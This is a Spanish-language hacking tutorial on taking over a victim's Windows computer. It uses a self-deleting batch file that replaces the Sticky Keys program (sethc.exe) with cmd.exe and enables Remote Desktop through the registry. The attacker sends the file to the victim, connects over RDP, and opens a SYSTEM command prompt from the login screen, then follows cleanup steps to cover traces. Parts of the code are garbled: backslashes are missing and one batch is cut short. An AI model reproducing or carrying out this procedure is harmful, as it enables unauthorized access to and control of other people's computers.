1)Escanear los puertos, para ver si tiene el puerto 3389 (El de escritorio
 remoto)abierto,
si es que tiene el puerto habilitado seguir el paso 2), si es que el
puerto y Escritorio Remoto no esta funcionando el pasar al paso 2.1):

2)Crear un batch que haga los siguientes Códigos:

Abres Bloc de Notas ,y escribes este code ,y le pones de extencion .bat

----------------------------------------------------------------------------------------

echo off

Este
batch lo que hace es crearnos un agujero para poder pasar. Setch es el
programita que inicia cuando presionamos 5 veses Shift. Tambien es
posible utilizar Sethc.exe en el escritorio Remoto de Windows.
Luego de alguna forma mandamos el batch a nuestra victima y cuando lo abra nos abrira el paso
y el batch se autoborrara.

2.1)Si es que no tiene habilitado el "Escritorio Remoto de Windows" creamos
el siguiente Batch para activarlo y crear el agujero que nos dejara pasar.

--------------------------------------------------------------------------------------------------------
echo off
title .
cls
Copy "c:windowssystem32sethc.exe" "c:windowssystem32sethc.zzz"
Copy "c:windowssystem32cmd.exe" "c:windowssystem32sethc.exe"
reg delete "HKLMSystemCurrentControlSetControlTerminal Server" /v fDenyTSConnect ions /f
reg add "HKLMSystemCurrentControlSetControlTerminal Server" /v fDenyTSConnect ions /t "REG_DWORD" /d 0
del %0
exit
---------------------------------------------------------------------------------------------------------

Y esto se lo enviamos ha la victima de alguna forma y al momento de abrirlo nos habilitara el"Escritorio Remoto de Windows" y nos abrira el paso y el Batch se AutoBorrara.

3)Luego abrimos Inicio/programas/Accesorios/comunicaciones/ConeXion a escritorio remoto
Presionamos opciones, y rellenamos los datos de la pestaña General de la siguiente forma:

Equipo:1.2.3.4                            <- Direcciona IP de la victima
Nombre de Usuario:                    <-No ponemos nada lo dejamos Vacio
Contraseña:                                <-Lo dejamos vacio.
Dominio:                                      <-Lo dejamos vacio.

Luego nos pasamos a la pestaña "Recursos locales"
y cambiamos solo la opcion "Teclado", desplegamos la lista y seleccionamos "En el equipo remoto"

4)Luego click en conectar.

5)Cuando
nos salga la ventanita pidiendo USER/PASS presionamos 5 veses SHIFT y
nos saldra la ventanita de DOS en el equipo remoto y STICKYKEYS en
nuestra maquina, el STICKYKEYS de nuestra maquina lo cerramos para que
no nos moleste.

6)Ahora tenemos
acceso a la raiz osea como SYSTEM (NT AUTHORITYSYSTEM) teniendo es DOS
en la mano, podemos iniciar algunos servicios como ser el telnet, o
podemos modificar algunas cosas de su PC. (Esto si quieren, inicien:
Compmgmt.msc).

7)Para
finalizar debemos borrar el programa que nos dejo pasar, Recuerdan que
hize una copia de Sethc.exe a Sethc.zzz ahora tenemos que volver las
cosas como estaban.

--------------------------------------------------------------------------------------------------

---------------------------------------------------------------------------------------------------